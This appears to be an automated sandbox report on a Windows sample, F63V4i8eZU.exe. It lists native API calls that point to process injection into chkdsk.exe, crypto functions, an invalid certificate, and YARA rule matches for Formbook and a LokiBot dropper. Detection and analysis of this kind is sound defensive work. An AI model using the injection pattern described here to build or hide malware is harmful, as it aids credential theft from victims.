Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D NtWriteVirtualMemory, 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C45 NtWriteVirtualMemory, 0_2_022A4C45
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 NtWriteVirtualMemory, 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CBE NtWriteVirtualMemory, 0_2_022A4CBE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CB4 NtWriteVirtualMemory, 0_2_022A4CB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 NtWriteVirtualMemory, 0_2_022A7488
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4CD8 NtWriteVirtualMemory, 0_2_022A4CD8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4D4C NtWriteVirtualMemory, 0_2_022A4D4C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A20 NtResumeThread,LdrInitializeThunk, 18_2_1E3F9A20
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 18_2_1E3F9A00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_1E3F9660
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A50 NtCreateFile,LdrInitializeThunk, 18_2_1E3F9A50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_1E3F96E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9710 NtQueryInformationToken,LdrInitializeThunk, 18_2_1E3F9710
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 18_2_1E3F97A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk, 18_2_1E3F9780
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_1E3F9860
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9840 NtDelayExecution,LdrInitializeThunk, 18_2_1E3F9840
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F98F0 NtReadVirtualMemory,LdrInitializeThunk, 18_2_1E3F98F0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_1E3F9910
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9540 NtReadFile,LdrInitializeThunk, 18_2_1E3F9540
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk, 18_2_1E3F99A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F95D0 NtClose,LdrInitializeThunk, 18_2_1E3F95D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9610 NtEnumerateValueKey, 18_2_1E3F9610
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A10 NtQuerySection, 18_2_1E3F9A10
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9670 NtQueryInformationProcess, 18_2_1E3F9670
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9650 NtQueryValueKey, 18_2_1E3F9650
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9A80 NtOpenDirectoryObject, 18_2_1E3F9A80
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F96D0 NtCreateKey, 18_2_1E3F96D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9730 NtQueryVirtualMemory, 18_2_1E3F9730
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA710 NtOpenProcessToken, 18_2_1E3FA710
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9B00 NtSetValueKey, 18_2_1E3F9B00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9770 NtSetInformationFile, 18_2_1E3F9770
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA770 NtOpenThread, 18_2_1E3FA770
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9760 NtOpenProcess, 18_2_1E3F9760
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FA3B0 NtGetContextThread, 18_2_1E3FA3B0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9FE0 NtCreateMutant, 18_2_1E3F9FE0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9820 NtEnumerateKey, 18_2_1E3F9820
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FB040 NtSuspendThread, 18_2_1E3FB040
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F98A0 NtWriteVirtualMemory, 18_2_1E3F98A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3FAD30 NtSetContextThread, 18_2_1E3FAD30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9520 NtWaitForSingleObject, 18_2_1E3F9520
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9560 NtWriteFile, 18_2_1E3F9560
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F9950 NtQueueApcThread, 18_2_1E3F9950
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F95F0 NtQueryInformationFile, 18_2_1E3F95F0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F99D0 NtCreateProcessEx, 18_2_1E3F99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9540 NtReadFile,LdrInitializeThunk, 31_2_054A9540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A95D0 NtClose,LdrInitializeThunk, 31_2_054A95D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9710 NtQueryInformationToken,LdrInitializeThunk, 31_2_054A9710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9FE0 NtCreateMutant,LdrInitializeThunk, 31_2_054A9FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9780 NtMapViewOfSection,LdrInitializeThunk, 31_2_054A9780
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9650 NtQueryValueKey,LdrInitializeThunk, 31_2_054A9650
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 31_2_054A9660
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A96D0 NtCreateKey,LdrInitializeThunk, 31_2_054A96D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 31_2_054A96E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 31_2_054A9910
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A99A0 NtCreateSection,LdrInitializeThunk, 31_2_054A99A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9840 NtDelayExecution,LdrInitializeThunk, 31_2_054A9840
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9860 NtQuerySystemInformation,LdrInitializeThunk, 31_2_054A9860
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A50 NtCreateFile,LdrInitializeThunk, 31_2_054A9A50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9560 NtWriteFile, 31_2_054A9560
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9520 NtWaitForSingleObject, 31_2_054A9520
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AAD30 NtSetContextThread, 31_2_054AAD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A95F0 NtQueryInformationFile, 31_2_054A95F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9760 NtOpenProcess, 31_2_054A9760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA770 NtOpenThread, 31_2_054AA770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9770 NtSetInformationFile, 31_2_054A9770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA710 NtOpenProcessToken, 31_2_054AA710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9730 NtQueryVirtualMemory, 31_2_054A9730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A97A0 NtUnmapViewOfSection, 31_2_054A97A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9670 NtQueryInformationProcess, 31_2_054A9670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9610 NtEnumerateValueKey, 31_2_054A9610
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9950 NtQueueApcThread, 31_2_054A9950
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A99D0 NtCreateProcessEx, 31_2_054A99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AB040 NtSuspendThread, 31_2_054AB040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9820 NtEnumerateKey, 31_2_054A9820
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A98F0 NtReadVirtualMemory, 31_2_054A98F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A98A0 NtWriteVirtualMemory, 31_2_054A98A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9B00 NtSetValueKey, 31_2_054A9B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054AA3B0 NtGetContextThread, 31_2_054AA3B0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A00 NtProtectVirtualMemory, 31_2_054A9A00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A10 NtQuerySection, 31_2_054A9A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A20 NtResumeThread, 31_2_054A9A20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A9A80 NtOpenDirectoryObject, 31_2_054A9A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39D50 NtCreateFile, 31_2_00C39D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E80 NtClose, 31_2_00C39E80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E00 NtReadFile, 31_2_00C39E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39F30 NtAllocateVirtualMemory, 31_2_00C39F30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39DA9 NtReadFile, 31_2_00C39DA9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39E7A NtClose, 31_2_00C39E7A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C39F2D NtAllocateVirtualMemory, 31_2_00C39F2D
Detected potential crypto function
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5359 0_2_022A5359
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A55EC 0_2_022A55EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8254 0_2_022A8254
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A84 0_2_022A5A84
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AFD 0_2_022A2AFD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AD6 0_2_022A2AD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A22D5 0_2_022A22D5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B2B 0_2_022A0B2B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B73 0_2_022A0B73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0B9B 0_2_022A0B9B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33EC 0_2_022A33EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A103C 0_2_022A103C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A781E 0_2_022A781E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A78B2 0_2_022A78B2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A48E8 0_2_022A48E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3920 0_2_022A3920
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8138 0_2_022A8138
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A09A8 0_2_022A09A8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A19CC 0_2_022A19CC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2E2F 0_2_022A2E2F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0618 0_2_022A0618
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8E7C 0_2_022A8E7C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A968F 0_2_022A968F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8ED8 0_2_022A8ED8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8F40 0_2_022A8F40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7FF5 0_2_022A7FF5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2C5C 0_2_022A2C5C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A84A6 0_2_022A84A6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A348A 0_2_022A348A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 0_2_022A7488
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A34EA 0_2_022A34EA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A84E9 0_2_022A84E9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3568 0_2_022A3568
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0D50 0_2_022A0D50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2DA0 0_2_022A2DA0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A35B0 0_2_022A35B0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A0584 0_2_022A0584
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A25D4 0_2_022A25D4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D6E30 18_2_1E3D6E30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482EF7 18_2_1E482EF7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4822AE 18_2_1E4822AE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482B28 18_2_1E482B28
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EEBB0 18_2_1E3EEBB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47DBD2 18_2_1E47DBD2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481FF1 18_2_1E481FF1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47D466 18_2_1E47D466
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C841F 18_2_1E3C841F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471002 18_2_1E471002
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4828EC 18_2_1E4828EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB090 18_2_1E3CB090
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4820A8 18_2_1E4820A8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B0D20 18_2_1E3B0D20
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481D55 18_2_1E481D55
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BF900 18_2_1E3BF900
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E482D07 18_2_1E482D07
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4825DD 18_2_1E4825DD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CD5E0 18_2_1E3CD5E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_0056968F 18_2_0056968F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531D55 31_2_05531D55
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532D07 31_2_05532D07
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05460D20 31_2_05460D20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055325DD 31_2_055325DD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552D466 31_2_0552D466
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547841F 31_2_0547841F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553DFCE 31_2_0553DFCE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05531FF1 31_2_05531FF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552D616 31_2_0552D616
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05486E30 31_2_05486E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532EF7 31_2_05532EF7
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546F900 31_2_0546F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05484120 31_2_05484120
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054899BF 31_2_054899BF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05521002 31_2_05521002
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0553E824 31_2_0553E824
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548A830 31_2_0548A830
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055328EC 31_2_055328EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547B090 31_2_0547B090
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054920A0 31_2_054920A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055320A8 31_2_055320A8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548AB40 31_2_0548AB40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05532B28 31_2_05532B28
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552DBD2 31_2_0552DBD2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055203DA 31_2_055203DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0549EBB0 31_2_0549EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0551FA2B 31_2_0551FA2B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_055322AE 31_2_055322AE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3D069 31_2_00C3D069
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C21030 31_2_00C21030
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3DA97 31_2_00C3DA97
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22D8D 31_2_00C22D8D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22D90 31_2_00C22D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C29E2B 31_2_00C29E2B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C29E30 31_2_00C29E30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C22FB0 31_2_00C22FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_00C3DF79 31_2_00C3DF79
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0546B150 appears 69 times
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: String function: 1E3BB150 appears 35 times
PE / OLE file has an invalid certificate
Source: F63V4i8eZU.exe Static PE information: invalid certificate
PE file contains strange resources
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F63V4i8eZU.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: F63V4i8eZU.exe, 00000000.00000002.316213281.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.481559175.000000001E63F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.476842708.00000000023E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.476803523.0000000000AF0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000000.315529096.0000000000438000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe, 00000012.00000002.475313264.00000000000D6000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs F63V4i8eZU.exe
Source: F63V4i8eZU.exe Binary or memory string: OriginalFilenameISOL.exe vs F63V4i8eZU.exe
Uses 32bit PE files
Source: F63V4i8eZU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
